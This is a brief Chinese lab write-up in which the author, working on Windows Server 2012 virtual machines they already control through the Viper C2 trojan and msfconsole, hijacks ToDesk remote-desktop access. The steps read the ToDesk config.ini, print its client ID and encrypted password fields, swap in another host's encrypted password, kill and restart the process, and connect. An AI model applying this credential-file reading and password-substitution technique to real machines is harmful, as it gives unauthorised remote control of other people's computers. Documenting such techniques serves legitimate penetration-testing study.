设备:Win2012R2虚拟机,Win2012虚拟机,本机
将Todesk的个人版和Lite版分别通过viper木马连接下载到本地主机和目标机(WIn2012,Win2012R2)
1.msfconsole命令行启动目标机Win12的Todesk_lite.exe,并读取其配置文件,并复制到本地
type C:\ProgramData\ToDesk_Lite\config.ini
[ConfigInfo] passUpdate=3 PrivateScreenLockScreen=1 autoLockScreen=1 downloadtimes=202401090 clientId=205426055 PrivateData=3f5b3b193eb499279a5e30b570906f54eddfb833429426b440baba19bddb8c44eeca6de70960db7ffce2c36546f12ad2b42872f30b3f5b1a53 PluginExpiresDays=0 tempAuthPassEx=8c9f285ad51918a635a2dd8e5e320416ecd9568a2a72d6da22b42f76f64c34aab7ea5984452dedc8c5545d564ead2c5638f31d743d1e4cec updatePassTime=20240109 language=936
2.在Win12R2上启动Todesk_lite.exe,读取配置文件,并复制到本地
3.获取Win12的clientid并将config.ini加密的密码替换为Win12R2加密后的密码
4.用Viper将Win12的config.ini文件删除,并用tasklist查看进程,用taskklii /F /PID 1234 中止进程
5.重新运行Win12上的Todesk_lite.exe,并通过本机的Todesk个人版连接,输入替换的Win12R2的密码及Win12的clientid,连接成功